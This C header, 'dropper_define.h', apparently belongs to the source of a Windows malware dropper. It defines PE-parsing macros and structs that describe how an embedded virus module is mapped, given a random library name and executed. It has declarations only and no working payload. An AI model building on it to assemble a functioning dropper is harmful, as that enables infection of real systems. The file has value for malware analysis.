dropper_define.h

1. #ifndef DEFINE_H
2. #define DEFINE_H
3.  
4. #include "StdAfx.h"
5.  
6. #define IMAGE_NT(h)             (PIMAGE_NT_HEADERS)(((PIMAGE_DOS_HEADER)h)->e_lfanew + (DWORD)h)
7. #define SECTION_TABLE(h)        (PIMAGE_SECTION_HEADER)((DWORD)h + h->FileHeader.SizeOfOptionalHeader + sizeof(IMAGE_FILE_HEADER) + sizeof(DWORD))
8.  
9. #define HAS_FAILED(v, r) { if(v) return (r); }
10. #define _SIZE(x, y) (DWORD)((DWORD)x - (DWORD)y)
11.  
12. // Return Global Encoded Function Pointer
13. #define _F(s) g_hardAddrs.##s
14.  
15. #define MZ_HEADER 0x5A4D
16. #define PE_HEADER 0x4550
17.  
18. typedef void (*__tLibraryExecEntry)(LPVOID, INT32);
19. typedef NTSTATUS (*__tAlignAddresses)(PIMAGE_DOS_HEADER *);
20.  
21. typedef struct _GENERAL_INFO_BLOCK {
22.     DWORD  OriginalAddress;
23.     DWORD UnknownZero0;
24.     HANDLE MappedAddress;
25.     DWORD  AlignAddressesFunction;
26.     WCHAR  RandomLibraryName[32];
27.     DWORD AbsoluteEntryPoint;
28.     DWORD UnknownZero1;
29.     DWORD SizeOfStackReserve;
30.     DWORD SizeOfStackCommit;
31.     DWORD Subsystem;
32.     WORD MinorSubsystemVersion;
33.     WORD MajorSubsystemVersion;
34.     DWORD UnknownZero2;
35.     WORD Charactersitics;
36.     WORD DllCharacteristics;
37.     WORD Machine;
38.     BYTE  UnknownOne;
39.     BYTE  UnknownFour;
40.     DWORD LoaderFlags;
41.     DWORD VirusModuleSize;
42.     DWORD UnknownZero3;
43. } GENERAL_INFO_BLOCK, *PGENERAL_INFO_BLOCK;
44.  
45. typedef struct _SECTION_SEGEMENT_INFO {
46.     DWORD SegmentAddress;
47.     DWORD SegmentSize;
48. } SECTION_SEGEMENT_INFO, *PSECTION_SEGEMENT_INFO;
49.  
50. typedef struct _VIRUS_MODULE_BLOCKS_HEADER {
51.     GENERAL_INFO_BLOCK    InformationBlock;
52.     HMODULE               VirusModulePointer;
53.     SECTION_SEGEMENT_INFO UnknownSegment;
54.     SECTION_SEGEMENT_INFO VirusModuleSegment;
55.     INT32                 LibraryExecuteEntryNumber;
56. } VIRUS_MODULE_BLOCKS_HEADER, *PVIRUS_MODULE_BLOCKS_HEADER;
57.  
58. typedef struct _ASM_CODE_BLOCKS_HEADER {
59.     DWORD                 ExecuteLibrary;
60.     DWORD                 AlignAddresses;
61.     SECTION_SEGEMENT_INFO ASMBlock1Segment;
62.     SECTION_SEGEMENT_INFO CodeBlockSegment;
63.     SECTION_SEGEMENT_INFO ASMBlock0Segment;
64.     DWORD                 VirusModuleSection;
65. } ASM_CODE_BLOCKS_HEADER, *PASM_CODE_BLOCKS_HEADER;
66.  
67. #endif // DEFINE_H